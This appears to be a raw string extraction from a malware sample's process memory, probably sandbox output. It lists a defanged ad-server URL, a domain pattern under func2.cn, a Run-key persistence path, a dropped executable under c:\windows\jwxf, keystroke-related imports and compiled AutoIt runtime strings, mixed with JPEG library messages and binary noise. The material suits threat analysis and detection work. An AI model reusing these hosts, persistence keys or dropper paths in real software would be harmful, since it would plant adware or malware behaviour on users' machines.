x-x-x-x-x-x

serverport

clientport

\BCmain.exe

cnkftpserver

hXXp://%s/main_ad.html

ad%d.func2.cn

KERNEL32.DLL

SOFTWARE\Microsoft\Windows\CurrentVersion\Run

AnnxePro.exe

MainPro.exe

\mswnsock.dll

\mswinsock.dll

%H,%A,%S,%B,%d,%D,%M,%m,%Y

%s\$sctemp%d.tmp

SYSTEM\CurrentControlSet\Services\WinSock2\TCPIPSH

%u.%u.%u

IeImgSnd.dll

IEXPLORE.exe

iexplore.exe

ad.adb

userip.ipb

CWebBrowser2

mfc90.dll

MSVCR90.dll

_amsg_exit

_acmdln

_crt_debugger_hook

GetWindowsDirectoryA

KERNEL32.dll

UnhookWindowsHookEx

ExitWindowsEx

GetAsyncKeyState

USER32.dll

GDI32.dll

RegCloseKey

RegOpenKeyExA

RegCreateKeyExA

RegDeleteKeyA

RegEnumKeyA

ADVAPI32.dll

ShellExecuteExA

SHELL32.dll

COMCTL32.dll

ole32.dll

MSVCP90.dll

WS2_32.dll

IPHLPAPI.DLL

WINMM.dll

GetProcessHeap

.PAVCException@@

.?AVCCmdTarget@@

;3 #>6.&

'2, / 0&7!4-)1#

.PAVCInternetException@@

.?AVCWebBrowser2@@

.?AVCUDPComm@@

Bogus message code %d

Invalid component ID %d in SOS

IDCT output block size %d not supported

Wrong JPEG library version: library is %d, caller expects %d

Invalid memory pool code %d

Unsupported JPEG data precision %d

Invalid progressive parameters Ss=%d Se=%d Ah=%d Al=%d

Invalid progressive parameters at scan script entry %d

Invalid scan script at entry %d

Improper call to JPEG library in state %d

JPEG parameter struct mismatch: library thinks size is %u, caller expects %u

Buffer passed to JPEG library is too small

Too many color components: %d, max %d

Unsupported color conversion request

Bogus DAC index %d

Bogus DAC value 0x%x

Bogus DHT index %d

Bogus DQT index %d

Empty JPEG image (DNL not supported)

Maximum supported image dimension is %u pixels

Cannot transcode due to multiple use of quantization table %d

Backing store not supported

Huffman table 0xx was not defined

Quantization table 0xx was not defined

Not a JPEG file: starts with 0xx 0xx

Insufficient memory (case %d)

Cannot quantize more than %d color components

Cannot quantize to fewer than %d colors

Cannot quantize to more than %d colors

Unsupported JPEG process: SOF type 0xx

Failed to create temporary file %s

Unsupported marker type 0xx

Adobe APP14 marker: version %d, flags 0xx 0xx, transform %d

Unknown APP0 marker (not JFIF), length %u

Unknown APP14 marker (not Adobe), length %u

Define Arithmetic Table 0xx: 0xx

Define Huffman Table 0xx

Define Quantization Table %d precision %d

Define Restart Interval %u

Freed EMS handle %u

Obtained EMS handle %u

= = = = = = = =

JFIF APP0 marker, density %dx%d %d

Warning: thumbnail image size does not match data length %u

Unknown JFIF minor revision number %d.d

with %d x %d thumbnail image

Skipping marker 0xx, length %u

Unexpected marker 0xx

%4u %4u %4u %4u %4u %4u %4u %4u

Quantizing to %d = %d*%d*%d colors

Quantizing to %d colors

Selected %d colors for quantization

At marker 0xx, recovery action %d

RST%d

Smoothing not supported with nonstandard sampling ratios

Start Of Frame 0xx: width=%u, height=%u, components=%d

Component %d: %dhx%dv q=%d

Start Of Scan: %d components

Component %d: dc=%d ac=%d

Ss=%d, Se=%d, Ah=%d, Al=%d

Closed temporary file %s

Opened temporary file %s

Unrecognized component IDs %d %d %d, assuming YCbCr

Freed XMS handle %u

Obtained XMS handle %u

Unknown Adobe color transform code %d

Inconsistent progression sequence for component %d coefficient %d

Corrupt JPEG data: %u extraneous bytes before marker 0xx

Warning: unknown JFIF revision number %d.d

Corrupt JPEG data: found marker 0xx instead of RST%d

%ld%c

688688688

.2688688688688688

.2688688

^['Vc%Xa Tg X_2]m2aj2dj1Zk2gj1]k1_k2ej1Xk2ri3ek4hk1Zj3ik5\e4r\4_o5g[3qc3]]-amNfc8me3e^6`f0Ya7g`1Zf6f`=[d;Zf6h`6WiEmY1Zb1_^FkZ9jY[`>lU2Xj5oXEb[Fj^>lc=n^>lbBlZ@n[5iW?eSEj^Gi^?gUjW=jWAfVmZ>dU

YX.QS

w`zuFraxbKf[Eo_Hl]>}dLf[=u_CbRIqc:oXLcY9hR8iSIeX@gV9iS9iT9iT:hU:hU;iV;jW:lV:jV:lW;iV;lX;kX;kY8kR2bA;n[;iV:jU/a>=mYp^)eZ5gU g[/h]1k\:p_)hb1l`/lb ib4na-jb1lb

b`8jW)ib1l`/j`*qm3pd)pl1ph/ri*h`3na*jd/i]2fV9\R3m_ ib.kc2iW(g`8pc9wp)kg1j^:vk0k`,ja i`1ql)hb4k]

.2*46 13

,0$25'35

03 2:)33!3@ 29,56

u7uh.oj6oe,xv=

/=!3@"3@

09$4> 12

04(48#3:(35

02 13$24

28L,6@$4D07=

2H_#4E

6jZ.SQ-SS:ign

-0!2?-GR.IT/HS-JT&:Q

.="3B#4H#4K&5I*8P%5G'6K&5I)7N*"3>!3=-7F.7A'4=*6F48?'5C37:&5@ 5

/1/56!24$34

.D#?D*>R)9S/OS.MT-MT3KT.IV)6O,8R

*,8?=99!02

0D_&6J)5M'9S;PdPXsjfnYi|Xrnjl

bdi.HR

467137345

1.II}

P]v.MU 6K,7I(7P):O$:M.CM;FM9@S-4G$:L'8I)5I(7Q.7E08B(6R"3G"3J#3C17C$6L!16*6I,59!4C!/A

`d%d`M

/O4

2O#5N$5M$5Y,CT):] @V,De*9S.LO,D],CK,C] AT AN)6N)7N)6N)6N)6N)5N >O,DP ?P)8N BP,CP)7N-JR*:N ?P)6N)7N)7N)7N)7N(7O*7P&6J

2N!5Q!4P)7S*>f,C] C`*=e,DU*Ad,Ea):W*<_ ap>O-HR.KT ?O)7N,CP =O AP*8N)7N)7N)7N*7O)7N

4W(6L(6a%6^,E_*Ab(7Z,E_ Bc*

3Q'9]ÃŠ);j.Gf,Da*>Y,F](N-KO0H`,DQ.OR.PP,FO,BQ C]*:L,EO)9N @P)8L)6N)6N)7N*7O$5K

5X"5d'9_Ã‹*=h.Gd B`(8c C` D_)9a A])9` E[*;L)7M,CN)6T);W*8L.KT @`,CZ A[.LN/Da-HN,D[.HY ?N*8_->\-B[,?V @P(7`*>N ?O)6N)7N'7P 3H!3I

2T(6M!7^":n);i/Dm(7](9p,E]*=k*?e BZ Bc A_(6U)T)6U*:N*:N)6N)7N 8O 4M

1Z(>`*@e C`*>h,F](=h ?e D])9i(9d)9^*:])8M)6U)7N(9b*;Y,DO(8Z C`.LT*=Q1Ji.MR2La0L[.MV*@d D] B] @M*8V0Gc'4K*9O)8M)7N)7N)7O%5M

5c 4a*7s(7p-?p Cn!:j);i(9l(8[ Ca D_,E`)9Q)7])6V(6X,CW @R,D`.MS*@d.J_1Ld0L^1Lc/LZ1Le.H^ >c.HS.HW*;c,DQ 9U ?L*

3N$4h"Ek%?k0>r.Cj)=e.Gf ?j*7p*?e)

Kd)f.KY2Lk0L`0L^1Lc0M^/Kc-C`0K_*Ac

Fd <_ d>\/H`(6a*=U*=Y)6Q*7M&6N

5w 4ao"@u

@t&Lu);o%6o%;q'9p(6o*G^*

Lb&;Y ;r.Cm,G\-Bi2Hq1Fp3Kp3Kp3Kp3Kp3Kp3Kp3Kp3Kn1N]2Jr ?i0Gm*

:]'4])8n)6d(:h1Kg0Er1Ip.Bo4Lp3Kp3Kp3Kp3Kp3Kp3Kp2Jp/Dq0Eq.Gc3Mi0C`3Jv ;g*?\,E_)7O(7X-9M

Bv'8q*;i$=k&5g'7l!:`*?c.At0Gp1Hp.Bo4Lp3Kp3Kp3Kp3Jp3Ip3Kp3Jp/Dp5Np/Dq0Gq.Do0Jb-Eh);k*>g(8c*8W"5M

Dv*7n'9n&8n);h'5q-An2Ko2Ip-@o4Lp3Kp3Kp3Jn3Lp3Lp3Kp3Kp1Hp4Mp.Bo0Gp4Lp0Fr0Kd)?e D^):c)7S 8L

9m,C_$=m$=l1Fp1Gp2Ip0Gp3Lp3Kq3Q}3Po4To3Jp2Jp,@o4Lp4Lp0Ep1Hp*

Lc)4q->q3Kp.Bo0Gp/Co4Lp3Kp3Il3Io3Hp3Kp3Kp3Kp1Gp1Gp.Bo2Jp1Ip1Ho/Cs D_.Bf(7e*8V

5]l4Xo3Ip3Kp3Kp3Kp1Hp3Jp0Fp.Co3Jp ?i =\.Ce(6P'6Q

5q%9q%;q)7n(8o%6p(8o'7o ;o,>o4Mp2Ip2Ip3Kp3Kq3Kq3Kn3Lp3Kp4Lp/Dp.Co4Mp,?o3Kp1Hp2Jp1Hq ;j ;_(7b*7J%6N

>v 6q"6p!6p%5o"?t&9p"6p$7p$6p ?u0Jq.Bo5Np/Do1Hp3Ko3Ox3Py4T

3Nu4Lo0Ep0Fo4Mp-@o.Co0Gp2Hp0Ep*A_*?])6b 4U

5q)8o(8o-Eq,@o5Mp-Bo1Gp3Ko3Nu3Nv3Il3Kp4Lp/Dp-Bo4Lp2Ip-Bo/Ep.Bp3Kp-@o.Cm(9k*7U$6N

6q'8o*8n0Fp6Mo/Bn G}3Lr3Im4R}3Pz3Jn3Kp4Lp0Eo,?o2Ip,@o1Gp/Do1Hp-Aq.Dm*=`)6P 5M

6q&7o-;n)Lt,Lr/K|3Lr3Jn4S~3Pz3Jn3Kp3Lp0Fp,@o2Ip-@o1Hp/Do1Hp.Ap.Dm*=^(7b

3r!6p&7p%9q Hv0Kq/Kr4Jn,?o3Kn3Ox3Nu3Ko3Kp4Mp,>o,@p3Kp.Cp/Do1Ip2Ip/Fq*;g(6])7]#6P

2Jo3Ko4Lo2Ip,?o*o3Jp.Bp(6b*7M

2Jr2Kr0Lx.Cn.Cp*o2Hp

=s'Js-E}0Ku(A|6Lj.J{1Kt.J|0Jv-J~6On ;o(9o2Jp*;o0Dp*

6,{6.|4(~3#

,J~0Jv1Js.Jz4Lp0En0Ep =o):o3Lp*

4p,>p.Jq'I

(>x(7m*

1Ks0Lx0Cl/Bm)9o*:o*;o'6o.Ap);o =p(7k)8P

3o.Du(E

3Lr,Bt'o.Cp*

.Hx(A{$A

,Ez.Hy J

-Du.Fw)=s&>|%7p#6p)8o(8o(8o(8o(8r*8T

-K}&G

%6s%6u'7r)8o(8o'6o(6p

QGxG=zI?xD;u

F=}8.wC:

5 |5,~5,

5 |5,~5 {-

6 v1%x0

7-~5,|5,

Z%%U(&O

s- r5/q4,r5-l0%c

>3v6-t4 r0%d(

8-x7.yB8~3*|@7

Gv*@o.Ls Lw*Mt

0Ix)Lu Lw2Lr.Ok/Jo.Nk.Is/Jr

4g"6no(6t

!4 "6 !3

#5!#8#'6 !/

HHHsssHHH]]]

88{88{88{88{88{\\

1.130303.393

{8856F961-340A-11D0-A96B-00C04FD705A2}

MainProX.exe_600:

`.rsrc

\.ptx|x

PSSSSSSh

Gt.Ht$

PSSSh@

PVSSh@

f;Crt

?#%X.y

GetProcessWindowStation

operator

This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.

kernel32.dll

oleaut32.dll

RegDeleteKeyExW

advapi32.dll

Error text not found (please report)

operand of unlimited repeat could match the empty string

POSIX named classes are supported only within a class

erroffset passed as NULL

POSIX collating elements are not supported

this version of PCRE is compiled without UTF support

PCRE does not support \L, \l, \N{name}, \U, or \u

support for \P, \p, and \X has not been compiled

this version of PCRE is not compiled with Unicode property support

\N is not supported in a class

zcÃ

.zV:b

GetProcessHeap

CreatePipe

GetWindowsDirectoryW

GetCPInfo

RegDeleteKeyW

RegEnumKeyExW

RegCreateKeyExW

RegOpenKeyExW

RegCloseKey

SetViewportOrgEx

ShellExecuteExW

SHFileOperationW

ShellExecuteW

RegisterHotKey

GetKeyboardLayoutNameW

ExitWindowsEx

EnumThreadWindows

UnregisterHotKey

keybd_event

GetAsyncKeyState

SetKeyboardState

GetKeyboardState

GetKeyState

VkKeyScanW

EnumWindows

EnumChildWindows

MapVirtualKeyW

CloseWindowStation

SetProcessWindowStation

OpenWindowStationW

InternetCrackUrlW

HttpQueryInfoW

HttpOpenRequestW

HttpSendRequestW

FtpOpenFileW

FtpGetFileSize

InternetOpenUrlW

##@,&,//,))

.jQE2

4`%ud*

3(-,'')-*/%'

9(***3).**-)'

H%d=j@

0!;....(

.text

`.rdata

@.data

.rsrc

@.reloc

p21jj(%fo0.Kl,(Eq32]d

name="Microsoft.Windows.Common-Controls"

version="6.0.0.0"

publicKeyToken="6595b64144ccf1df"

KERNEL32.DLL

ADVAPI32.dll

COMCTL32.dll

COMDLG32.dll

GDI32.dll

IPHLPAPI.DLL

MPR.dll

ole32.dll

OLEAUT32.dll

PSAPI.DLL

SHELL32.dll

USER32.dll

USERENV.dll

UxTheme.dll

VERSION.dll

WININET.dll

WINMM.dll

WSOCK32.dll

mscoree.dll

combase.dll

- CRT not initialized

- Attempt to initialize the CRT more than once.

- floating point support not loaded

USER32.DLL

>>>AUTOIT NO CMDEXECUTE

CMDLINERAW

CMDLINE

/AutoIt3ExecuteLine

/AutoIt3ExecuteScript

APPSKEY

789:;?

FTPSETPROXY

GUICTRLRECVMSG

GUICTRLSENDMSG

GUIGETMSG

GUIREGISTERMSG

HOTKEYSET

HTTPSETPROXY

HTTPSETUSERAGENT

ISKEYWORD

MSGBOX

REGENUMKEY

SHELLEXECUTE

SHELLEXECUTEWAIT

TCPACCEPT

TCPCLOSESOCKET

TCPCONNECT

TCPLISTEN

TCPNAMETOIP

TCPRECV

TCPSEND

TCPSHUTDOWN

TCPSTARTUP

TRAYGETMSG

UDPBIND

UDPCLOSESOCKET

UDPOPEN

UDPRECV

UDPSEND

UDPSHUTDOWN

UDPSTARTUP

SendKeyDelay

SendKeyDownDelay

TCPTimeout

WINDOWSDIR

AUTOITEXE

HOTKEYPRESSED

D%s (%d) : ==> %s.:

Line %d:

Line %d (File "%s"):

%s (%d) : ==> %s:

AutoIt script files (*.au3, *.a3x)

*.au3;*.a3x

All files (*.*)

04090000

%u.%u.%u.%u

0.0.0.0

Mddddd

"%s" (%d) : ==> %s:

\??\%s

GUI_RUNDEFMSG

AUTOITCALLVARIABLE%d

255.255.255.255

Keyword

AUTOIT.ERROR

Null Object assignment in FOR..IN loop

Incorrect Object type in FOR..IN loop

3, 3, 9, 21

HKEY_LOCAL_MACHINE

HKEY_CLASSES_ROOT

HKEY_CURRENT_CONFIG

HKEY_CURRENT_USER

HKEY_USERS

%d/d/d

c:\windows\jwxf\MainProX.exe

%WinDir%\jwxf\MainProX.exe

AutoIt supports the __stdcall (WINAPI) and __cdecl calling conventions. The __stdcall (WINAPI) convention is used by default but __cdecl can be used instead. See the DllCall() documentation for details on changing the calling convention.

Missing operator in expression."Unbalanced brackets in expression.

Error parsing function call.0Incorrect number of parameters in function call.'"ReDim" used without an array variable.>Illegal text at the end of statement (one statement per line).1"If" statement has no matching "EndIf" statement.1"Else" statement with no matching "If" statement.2"EndIf" statement with no matching "If" statement.7Too many "Else" statements for matching "If" statement.3"While" statement has no matching "Wend" statement.4"Wend" statement with no matching "While" statement.%Variable used without being declared.XArray variable has incorrect number of subscripts or subscript dimension range exceeded.#Variable subscript badly formatted.*Subscript used on non-accessible variable.&Too many subscripts used for an array.0Missing subscript dimensions in "Dim" statement.NNo variable given for "Dim", "Local", "Global", "Struct" or "Const" statement.

0Expected a "=" operator in assignment statement.*Invalid keyword at the start of this line.

Invalid element in a DllStruct.*Unknown option or bad parameter specified.&Unable to load the internet libraries./"Struct" statement has no matching "EndStruct".HUnable to open file, the maximum number of open files has been exceeded.K"ContinueLoop" statement with no matching "While", "Do" or "For" statement.

Invalid file filter given.*Expected a variable in user function call.1"Do" statement has no matching "Until" statement.2"Until" statement with no matching "Do" statement.#"For" statement is badly formatted.2"Next" statement with no matching "For" statement.N"ExitLoop/ContinueLoop" statements only valid from inside a For/Do/While loop.1"For" statement has no matching "Next" statement.@"Case" statement with no matching "Select"or "Switch" statement.:"EndSelect" statement with no matching "Select" statement.ORecursion level has been exceeded - AutoIt will quit to prevent stack overflow.&Cannot make existing variables static.4Cannot make static variables into regular variables.

3This keyword cannot be used after a "Then" keyword.>"Select" statement is missing "EndSelect" or "Case" statement. "If" statements must have a "Then" keyword. Badly formated Struct statement."Cannot assign values to constants..Cannot make existing variables into constants.9Only Object-type variables allowed in a "With" statement.v"long_ptr", "int_ptr" and "short_ptr" DllCall() types have been deprecated. Use "long*", "int*" and "short*" instead.-Object referenced outside a "With" statement.)Nested "With" statements are not allowed."Variable must be of type "Object".1The requested action with this object has failed.8Variable appears more than once in function declaration.2ReDim array can not be initialized in this manner.1An array variable can not be used in this manner.

Can not redeclare a constant.5Can not redeclare a parameter inside a user function.HCan pass constants by reference only to parameters with "Const" keyword.*Can not initialize a variable with itself.$Incorrect way to use this parameter.:"EndSwitch" statement with no matching "Switch" statement.>"Switch" statement is missing "EndSwitch" or "Case" statement.H"ContinueCase" statement with no matching "Select"or "Switch" statement.

String missing closing quote.!Badly formated variable or macro.*Missing separator character after keyword.

MainProX.exe_600_rwx_00401000_000DF000:

PSSSSSSh

Gt.Ht$

PSSSh@

PVSSh@

f;Crt

?#%X.y

GetProcessWindowStation

operator

This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.

kernel32.dll

oleaut32.dll

RegDeleteKeyExW

advapi32.dll

Error text not found (please report)

operand of unlimited repeat could match the empty string

POSIX named classes are supported only within a class

erroffset passed as NULL

POSIX collating elements are not supported

this version of PCRE is compiled without UTF support

PCRE does not support \L, \l, \N{name}, \U, or \u

support for \P, \p, and \X has not been compiled

this version of PCRE is not compiled with Unicode property support

\N is not supported in a class

zcÃ

.zV:b

GetProcessHeap

CreatePipe

GetWindowsDirectoryW

GetCPInfo

RegDeleteKeyW

RegEnumKeyExW

RegCreateKeyExW

RegOpenKeyExW

RegCloseKey

SetViewportOrgEx

ShellExecuteExW

SHFileOperationW

ShellExecuteW

RegisterHotKey

GetKeyboardLayoutNameW

ExitWindowsEx

EnumThreadWindows

UnregisterHotKey

keybd_event

GetAsyncKeyState

SetKeyboardState

GetKeyboardState

GetKeyState

VkKeyScanW

EnumWindows

EnumChildWindows

MapVirtualKeyW

CloseWindowStation

SetProcessWindowStation

OpenWindowStationW

InternetCrackUrlW

HttpQueryInfoW

HttpOpenRequestW

HttpSendRequestW

FtpOpenFileW

FtpGetFileSize

InternetOpenUrlW

##@,&,//,))

.jQE2

4`%ud*

3(-,'')-*/%'

9(***3).**-)'

H%d=j@

0!;....(

.text

`.rdata

@.data

.rsrc

@.reloc

mscoree.dll

combase.dll

- CRT not initialized

- Attempt to initialize the CRT more than once.

- floating point support not loaded

USER32.DLL

>>>AUTOIT NO CMDEXECUTE

CMDLINERAW

CMDLINE

/AutoIt3ExecuteLine

/AutoIt3ExecuteScript

APPSKEY

789:;?

FTPSETPROXY

GUICTRLRECVMSG

GUICTRLSENDMSG

GUIGETMSG

GUIREGISTERMSG

HOTKEYSET

HTTPSETPROXY

HTTPSETUSERAGENT

ISKEYWORD

MSGBOX

REGENUMKEY

SHELLEXECUTE

SHELLEXECUTEWAIT

TCPACCEPT

TCPCLOSESOCKET

TCPCONNECT

TCPLISTEN

TCPNAMETOIP

TCPRECV

TCPSEND

TCPSHUTDOWN

TCPSTARTUP

TRAYGETMSG

UDPBIND

UDPCLOSESOCKET

UDPOPEN

UDPRECV

UDPSEND

UDPSHUTDOWN

UDPSTARTUP

SendKeyDelay

SendKeyDownDelay

TCPTimeout

WINDOWSDIR

AUTOITEXE

HOTKEYPRESSED

D%s (%d) : ==> %s.:

Line %d:

Line %d (File "%s"):

%s (%d) : ==> %s:

AutoIt script files (*.au3, *.a3x)

*.au3;*.a3x

All files (*.*)

04090000

%u.%u.%u.%u

0.0.0.0

Mddddd

"%s" (%d) : ==> %s:

\??\%s

GUI_RUNDEFMSG

AUTOITCALLVARIABLE%d

255.255.255.255

Keyword

AUTOIT.ERROR

Null Object assignment in FOR..IN loop

Incorrect Object type in FOR..IN loop

3, 3, 9, 21

HKEY_LOCAL_MACHINE

HKEY_CLASSES_ROOT

HKEY_CURRENT_CONFIG

HKEY_CURRENT_USER

HKEY_USERS

%d/d/d

c:\windows\jwxf\MainProX.exe

%WinDir%\jwxf\MainProX.exe

Missing operator in expression."Unbalanced brackets in expression.

0Expected a "=" operator in assignment statement.*Invalid keyword at the start of this line.

String missing closing quote.!Badly formated variable or macro.*Missing separator character after keyword.

Explorer.EXE_880_rwx_014E0000_00004000:

c:\windows\jwxf\YP.exe

wmsvcrt

WinExec

ShellExecuteExA

ShellExecuteExW

OpenWindowStationA

OpenWindowStationW

SetProcessWindowStation

GetProcessWindowStation

CloseWindowStation

EnumWindows

EnumThreadWindows

EnumChildWindows

RegOpenKeyExA

RegOpenKeyExW

RegEnumKeyExA

RegEnumKeyExW

RegDeleteKeyA

RegDeleteKeyW

RegCloseKey

HttpOpenRequestA

HttpOpenRequestW

HttpEndRequestA

HttpEndRequestW

HttpQueryInfoA

HttpQueryInfoW

UrlUnescapeA

UrlUnescapeW